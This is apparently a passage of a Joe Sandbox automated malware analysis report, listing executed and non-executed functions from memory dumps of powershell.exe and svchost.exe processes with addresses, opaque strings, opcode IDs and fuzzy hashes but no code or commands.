Instruction Fuzzy Hash: E121F87190CA4C4FDB59DBAC984A7F97BE0EB96331F04416BD048C3256DA74A406CB91

Function 00007FFD9A3B33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: cfc95461bfc77d5df945192b32c47d671371e64b5bc97e460da5dcdd76dbf12d
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 2E01A73121CB0C4FD748EF4CE451AB6B7E0FB85324F10056EE58AC3695DA36E882CB42

Function 00007FFD9A48414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1cb3dfe68afd0579823bd057627fe9c7c0c05482fef47d7ee1944eab871556
Instruction ID: bca730dba09b891e92cb53089eb94b5c99f46dec363e0767758fe424950f051c
Opcode Fuzzy Hash: 0a1cb3dfe68afd0579823bd057627fe9c7c0c05482fef47d7ee1944eab871556
Instruction Fuzzy Hash: C8F0BE32B4C5048FD769EA4CE8558A873E0EF5532571200FBE16DCB1A7CA3AEC44C781

Function 00007FFD9A484400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d922299f8a4d902b856d474f4a3a48e6eec9653aec5e0058a441569dadce7d5
Instruction ID: f290821bad43fb0898d4e6e428188b97ba7d32ac33a8e15a03e449228df04464
Opcode Fuzzy Hash: 4d922299f8a4d902b856d474f4a3a48e6eec9653aec5e0058a441569dadce7d5
Instruction Fuzzy Hash: DEF0BE32A0C5448FD768EA4CE8518A877E0EF05724B6100F6E15ECB0A7CA2AAC44C780

Function 00007FFD9A4841D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 04e587ef4f74a230f1638d53a30199f96beea9608b349cbfb2f5c11fc9524e70
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: F6E01A32B4C8088FDAB8DA4CF0549A973E1EB9833171101B7D14ECB561CA32EC518BC0

Non-executed Functions

Function 00007FFD9A3B8945 Relevance: 13.9, Strings: 11, Instructions: 152COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFD9A3B8A12
O_^, xrefs: 00007FFD9A3B8A7A
O_^, xrefs: 00007FFD9A3B8A62
O_^, xrefs: 00007FFD9A3B8ADA
O_^, xrefs: 00007FFD9A3B8AAA
O_^, xrefs: 00007FFD9A3B8ACA
O_^, xrefs: 00007FFD9A3B8AEA
O_^, xrefs: 00007FFD9A3B8A22
O_^, xrefs: 00007FFD9A3B89C2
O_^, xrefs: 00007FFD9A3B89F2
O_^, xrefs: 00007FFD9A3B8A02

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^
API String ID: 0-4246338644
Opcode ID: 86fd3529325349246c07c4e11e90cf56dc8119b0881a85801cc10816e078eec0
Instruction ID: d19f151a2b1381ac5461970008b019fb5113df00c4e03d0f4d080fa2d7afba1b
Opcode Fuzzy Hash: 86fd3529325349246c07c4e11e90cf56dc8119b0881a85801cc10816e078eec0
Instruction Fuzzy Hash: 6551B4A3A0E7C24FF35752A849B42653FA1EF93354F1D51FBC0A94F1E3E958180A8356

Function 00007FFD9A3B8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

O_^N, xrefs: 00007FFD9A3B8C72
O_^Q, xrefs: 00007FFD9A3B8C8A
O_^8, xrefs: 00007FFD9A3B8BF2
O_^K, xrefs: 00007FFD9A3B8C6A
O_^Y, xrefs: 00007FFD9A3B8CBA
O_^J, xrefs: 00007FFD9A3B8C62
O_^?, xrefs: 00007FFD9A3B8C2A
O_^<, xrefs: 00007FFD9A3B8C12

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
API String ID: 0-3814653101
Opcode ID: 767dc838b8e3e9580db012fdc19fa58d9d18fd9b3128ba9e1fe4c8e4c2756401
Instruction ID: 3f2f674582fba1d4519b9254b7fa3ae1b79ca93150f6c6a606e786123a5ceef0
Opcode Fuzzy Hash: 767dc838b8e3e9580db012fdc19fa58d9d18fd9b3128ba9e1fe4c8e4c2756401
Instruction Fuzzy Hash: 0821D0B3A255114AD3023FBDBC529E86780DB9477A34902F3E02DCF297D918A49B86C1

Function 00007FFD9A3B864D Relevance: 7.6, Strings: 6, Instructions: 50COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFD9A3B866A
O_^, xrefs: 00007FFD9A3B86DA
O_^, xrefs: 00007FFD9A3B869A
O_^, xrefs: 00007FFD9A3B865A
O_^, xrefs: 00007FFD9A3B86CA
O_^, xrefs: 00007FFD9A3B867A

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^$O_^$O_^
API String ID: 0-3255002459
Opcode ID: ddace57225b721f1eeac571684e3a421a9308b82336d885533d1526e9246d893
Instruction ID: d67c9cd311de69d90b931a0f0932ade619a6d9f33b9104366cfe90a2b14a780c
Opcode Fuzzy Hash: ddace57225b721f1eeac571684e3a421a9308b82336d885533d1526e9246d893
Instruction Fuzzy Hash: 041186A3E0E7C2CEF25612A54DF90653FA06E53315B0E44FBD0EE5F1E3E804180A8692

Function 00007FFD9A3B8535 Relevance: 5.0, Strings: 4, Instructions: 40COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFD9A3B8542
O_^, xrefs: 00007FFD9A3B8582
O_^, xrefs: 00007FFD9A3B8592
O_^, xrefs: 00007FFD9A3B8562

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-934926442
Opcode ID: 6bdf0962e57c18d9a894e9fa151da6eda224e24c1c2185134776f53fccb41351
Instruction ID: af01b627f9351c0ad2193756e326057c716e40a11d44f42d9d76287ee2fd8170
Opcode Fuzzy Hash: 6bdf0962e57c18d9a894e9fa151da6eda224e24c1c2185134776f53fccb41351
Instruction Fuzzy Hash: 00017C93E0D6C28EE72756B848780642F919FD3364B2E14FFD0EE4F1A3E858241AC742

Analysis Process: svchost.exePID: 7480, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9A3B1729 Relevance: .7, Instructions: 749COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f50f07056fa34564b849f017b7b6b4a0be81bcb98896833f206585f288ad67
Instruction ID: 1295718ab22f03d3adafe5bc5eea41d5d56d33f197585fb31f892e9dc4dd1664
Opcode Fuzzy Hash: 13f50f07056fa34564b849f017b7b6b4a0be81bcb98896833f206585f288ad67
Instruction Fuzzy Hash: AF32BA61F28A594FE798FB7884796B977D2FF98300B44057EE01EC32D6DE28A8418781

Function 00007FFD9A3B07FA Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

<P_^, xrefs: 00007FFD9A3B0801

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID: <P_^
API String ID: 0-1190497245
Opcode ID: ee4f87b8e1970a726d958b4c52d89dfce05a968516586b21495eb456527d425c
Instruction ID: bd2ae160f95b16c668508cc928db4454ece1b0978835751040a5b9a3b072f482
Opcode Fuzzy Hash: ee4f87b8e1970a726d958b4c52d89dfce05a968516586b21495eb456527d425c
Instruction Fuzzy Hash: D941CEB6BA910A4FD304EF6CA8759E93FA1AB882147884072D40CC73DECD30B90687D2

Function 00007FFD9A3B123D Relevance: 1.0, Instructions: 1000COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60552f4269a925d7ab81e72dd86248870588fbd637b0483df54d2ec8b7a22812
Instruction ID: a6ae4e561402d3dbdbb8ccf8ef18c6e415b0443dac3bd8049d4d52daad255770
Opcode Fuzzy Hash: 60552f4269a925d7ab81e72dd86248870588fbd637b0483df54d2ec8b7a22812
Instruction Fuzzy Hash: EF414262E1E3924FD716BBB868724E57F609F42228B0D01F7D0DCCB0E7D819645A83A6

Function 00007FFD9A3B0C9E Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 656a511af22c7bc7fa6276ff08096c0017c6a174443bdac0effc7c26c2ea64ca
Instruction ID: 729d1e4d54ff82cd5f95398d2df5c043e7ad96799f289a670bbbc4c0b3cda1b7
Opcode Fuzzy Hash: 656a511af22c7bc7fa6276ff08096c0017c6a174443bdac0effc7c26c2ea64ca
Instruction Fuzzy Hash: BB610622B1EAC61FE76AA7B868255797FD2EF8721070900FFD488CB1D7DD186C428352

Function 00007FFD9A3B2005 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258f1e5a06612896c387095dfa2fb0f807e4624e127832af8ff4e248a3a0e1aa
Instruction ID: 7477f3061cf546bf8c479d7442d380ad30902b0ac082f81d31679ba2540ea343
Opcode Fuzzy Hash: 258f1e5a06612896c387095dfa2fb0f807e4624e127832af8ff4e248a3a0e1aa
Instruction Fuzzy Hash: 07510311B1D6C90FD79AABB85874675BBD2DF8A215B0801FFE09DC71D7DE185806C342

Function 00007FFD9A3B10E2 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7636627dd0408bc701fdccd76cad756578b5b61f3bc69bf620af484a9e4e49aa
Instruction ID: 1b27e56c7ac9f82c1e53d827676a844b405fb5e9e54b0713ad4d75c77626ba5e
Opcode Fuzzy Hash: 7636627dd0408bc701fdccd76cad756578b5b61f3bc69bf620af484a9e4e49aa
Instruction Fuzzy Hash: 71518667E1E6911EE316BBB87C625E93F508F8227870C41F7D19C8F0EB9818145D87E6

Function 00007FFD9A3B10D3 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44089376af93a9c42a31a05a62d64cee510066fe0943d59c6ba0c706d86b17b8
Instruction ID: 82c2ac873dc7c788786364424116ca08ed09ef34f243673def96b888e401d1c5
Opcode Fuzzy Hash: 44089376af93a9c42a31a05a62d64cee510066fe0943d59c6ba0c706d86b17b8
Instruction Fuzzy Hash: 56414153E1F6911EE316BBB87C325E93F648F8222870C41F7D19CCB0EB9808245D82E6

Function 00007FFD9A3B0588 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e446db9c6f871f9f26328babef26ae92af871bbbe82455e821c5b47be28370a2
Instruction ID: baf4b3f236508052f845de300c6a8be2771a0c0ae1e840044ce10f2bdcf18733
Opcode Fuzzy Hash: e446db9c6f871f9f26328babef26ae92af871bbbe82455e821c5b47be28370a2
Instruction Fuzzy Hash: 33319521F189490FE798AB6C9869779B6C2EB9D314F0505BEE45EC32D7DE18AC428341

Function 00007FFD9A3B0B31 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23247df94cc22e084495845c018fcf3f0ed92872bac7744954c74cf4e398d8f9
Instruction ID: 1bddea3122eb24eacc7a1151607783412089911ebbe8598a4e3815821ae81980
Opcode Fuzzy Hash: 23247df94cc22e084495845c018fcf3f0ed92872bac7744954c74cf4e398d8f9
Instruction Fuzzy Hash: 4E31CB51F189094FE784BBB8486A7BC77D2EF99301F0401BBE41DC31D7DE28A8414382

Function 00007FFD9A3B09E1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ef525e4e40b3ae512b14b54fb10fe77bf9b0cfdcc72bb3ea08dcae62faaa33
Instruction ID: dfe13a76e04c0d03f4b3e359f973acbbd13d1913549830658490aecb726dbae6
Opcode Fuzzy Hash: d4ef525e4e40b3ae512b14b54fb10fe77bf9b0cfdcc72bb3ea08dcae62faaa33
Instruction Fuzzy Hash: AE318071F289098FDB44EFA8C865AFD7BA2FF98304F544579D019D72CADE38A8418781

Function 00007FFD9A3B0855 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c9f427b11e479add63e22ae66776b2abea5f4875f9c135cdb354978e70dde1e
Instruction ID: a46bc063be414d6d0d57f771c2c39b3e0fa4bf0cb18f8b87f546bd401787caea
Opcode Fuzzy Hash: 0c9f427b11e479add63e22ae66776b2abea5f4875f9c135cdb354978e70dde1e
Instruction Fuzzy Hash: 5541E9B2B696494FD358EF6898B59E97F71AF88204B8844A6D01DC73DECD34B900C7C2

Function 00007FFD9A3B1648 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a56ae255d35a47d53f2c0f6c8869e40d28dde652e182cd7b74a2b55ec8e269
Instruction ID: 2108d4c70e6afe051168ad9bd8ef70162b2a2b2139ee17c75c65b3cf4fe777fd
Opcode Fuzzy Hash: 06a56ae255d35a47d53f2c0f6c8869e40d28dde652e182cd7b74a2b55ec8e269
Instruction Fuzzy Hash: 85111273F5440A4FDB58EFD8D8655FD77B2EF94240B94017BD119EB2E5CE2429424780

Function 00007FFD9A3B21A1 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea426f5372789f3592939a4ed124ac75e39cd496f2a13551ccb9b5acaad95f9
Instruction ID: 91ae9b03b98587ae81cbc982c8864164eb019a7ad9c90617f3a9e2ee1b792e96
Opcode Fuzzy Hash: 4ea426f5372789f3592939a4ed124ac75e39cd496f2a13551ccb9b5acaad95f9
Instruction Fuzzy Hash: EE014C12B1C2C54FE399BBF85C758753FA1CF82250B0C05FBE888C60E7DC0869418392

Function 00007FFD9A3B16E9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0325a1b749e45559211dc9be67756904221d4f9227988068c994b5f985a8ae00
Instruction ID: 4e30fb3e8678b585bec2fee608a480ac0f925eae89c27522dc291f3324769963
Opcode Fuzzy Hash: 0325a1b749e45559211dc9be67756904221d4f9227988068c994b5f985a8ae00
Instruction Fuzzy Hash: 5CE0223390C6C44FD389DB5498252B1FBE0EF82220B0D46EBD098C71A2C66D49528381

Function 00007FFD9A3B1238 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f4249222d22a7f9d1c2e96b8a8265335ec7c943cc2a22ca9f1b64582a0d8ef
Instruction ID: 200fe534edf49d62d88f6472d073d73164d109469bab1ecc58ded550df6d787d
Opcode Fuzzy Hash: a3f4249222d22a7f9d1c2e96b8a8265335ec7c943cc2a22ca9f1b64582a0d8ef
Instruction Fuzzy Hash: 06D02E33A08D090BE2ACAA48A0162B0F3C0EB943A4B2800AFE418D32A8C9A618424280

Non-executed Functions

Function 00007FFD9A3B06FA Relevance: 7.6, Strings: 6, Instructions: 118COMMON

Download Yara Rule

Strings

P_^h, xrefs: 00007FFD9A3B0722
=P_^, xrefs: 00007FFD9A3B0701
P_^j, xrefs: 00007FFD9A3B072A
P_^|, xrefs: 00007FFD9A3B0772
P_^~, xrefs: 00007FFD9A3B077A
P_^^, xrefs: 00007FFD9A3B06FA

Memory Dump Source

Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd

Similarity

API ID:
String ID: =P_^$P_^^$P_^h$P_^j$P_^|$P_^~
API String ID: 0-43531156
Opcode ID: a7750e83b9585273ca929aadc0137a1e80d4d7f13743aeb283d44b5c30e7108d
Instruction ID: 727e0f1273beee0abf79e23e34d98c61cf5c3e5a62d05d52ba98403895a122ae
Opcode Fuzzy Hash: a7750e83b9585273ca929aadc0137a1e80d4d7f13743aeb283d44b5c30e7108d
Instruction Fuzzy Hash: 8831D3E7B190161AE3117BFD7892AEC234A9F8076878D0637D0EC8B0CF8918244A45D6

Analysis Process: svchost.exePID: 5664, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9A3E1729 Relevance: .7, Instructions: 749COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b804feb524adf46663ddb78687302424547b9441a91aeeae8367adf332022e9
Instruction ID: 9a35aec49dded8273116c992cbe1ad3aaadeacaa1c57496b24c278268fad506c
Opcode Fuzzy Hash: 8b804feb524adf46663ddb78687302424547b9441a91aeeae8367adf332022e9
Instruction Fuzzy Hash: 0532E961F29A094FE798FB7884796B977D2FF98301B5405BDE00EC32D6DE28AC418781

Function 00007FFD9A3E07FA Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

<M_^, xrefs: 00007FFD9A3E0801

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID: <M_^
API String ID: 0-1376500734
Opcode ID: 1a86a2666867344a9a18027843491713a4f896fd88c06e01a7edee2a0ddbdb20
Instruction ID: 8395096bf329ba16169d91a8e86b25491ce8483df4937db7d5ccd9f76102329f
Opcode Fuzzy Hash: 1a86a2666867344a9a18027843491713a4f896fd88c06e01a7edee2a0ddbdb20
Instruction Fuzzy Hash: D14105A2FAA54D4FD308AF6C98758E97F61AB942047884576D41AC33DFDE24A801C7D2

Function 00007FFD9A3E123D Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52f56e5f75f739ca9d4b4bbe27a7428c199d1909c79e1e056729401a0e09b5a
Instruction ID: 019a87eb017f809063a2d2afc55feba479e24d0256c186d697c2720e47a3655a
Opcode Fuzzy Hash: e52f56e5f75f739ca9d4b4bbe27a7428c199d1909c79e1e056729401a0e09b5a
Instruction Fuzzy Hash: 4A419023A1E7964FD756ABB868710E57FB0DF9322870D02F7D0D8CA0E7D819584A8396

Function 00007FFD9A3E0C9E Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274e8dd87f7eb95c7df97eeb122a24be3d97de23c681a4df569de3385d092db3
Instruction ID: c12a979700a21b7bace7cde6717666cce366cc53f1f08739c357045f679f18fe
Opcode Fuzzy Hash: 274e8dd87f7eb95c7df97eeb122a24be3d97de23c681a4df569de3385d092db3
Instruction Fuzzy Hash: 0E612622B4EACA1FE76AA7B868255797FD1EF8721071900FFD488C71D7CD186C428352

Function 00007FFD9A3E2005 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526b9b24a5ddfca8b9883d36b79dbd8799f8542219c76664398727d879db4df1
Instruction ID: 2cad77b6304ab05bef781ab720087fbf57be3b66256667924cb40fc200d08c8a
Opcode Fuzzy Hash: 526b9b24a5ddfca8b9883d36b79dbd8799f8542219c76664398727d879db4df1
Instruction Fuzzy Hash: 5C510221B1D6C90FDB9AABB85875675BBD1DF8A224B1800FEE09DC71D7DE185C06C342

Function 00007FFD9A3E10E2 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636d51c6be22001116793f56fb68228d290d1332bc38390e6f871f60f57feef5
Instruction ID: c836ff4331a23b18d2b96ebf00a5e4ce27115d76c5c268fadac5027aa7be0286
Opcode Fuzzy Hash: 636d51c6be22001116793f56fb68228d290d1332bc38390e6f871f60f57feef5
Instruction Fuzzy Hash: 3C518157E1F6A54FD3167BB878625E97F60CF8227970C02F7D19C8A0EB8C19144983E6

Function 00007FFD9A3E10D3 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b6f88c12b31a9684e7d670370a983e52ebd8f7d83986312bec78d36279ec71
Instruction ID: ef4d72549c3ef64423ab63009c94eec93057aa91c3cc6aad90187427e0fed8b4
Opcode Fuzzy Hash: b3b6f88c12b31a9684e7d670370a983e52ebd8f7d83986312bec78d36279ec71
Instruction Fuzzy Hash: 6D418157E1F6A50BE3167BB878325E57F608F9223971C02FBD19C8A0DB8C09184D83E6

Function 00007FFD9A3E0588 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d4a14a7a9f7e811d7f95a7eee72ad20fbc478f71eb778d79960b5024d866da
Instruction ID: 464086ee40317da40b1629d33ccf4515474bf1573a499897310bbc25b82c8e7e
Opcode Fuzzy Hash: b5d4a14a7a9f7e811d7f95a7eee72ad20fbc478f71eb778d79960b5024d866da
Instruction Fuzzy Hash: FF31B621F189490FEB98BB6C9869779B7C2EB99314F0405BEE05EC32D7DE58AC428341

Function 00007FFD9A3E0B31 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
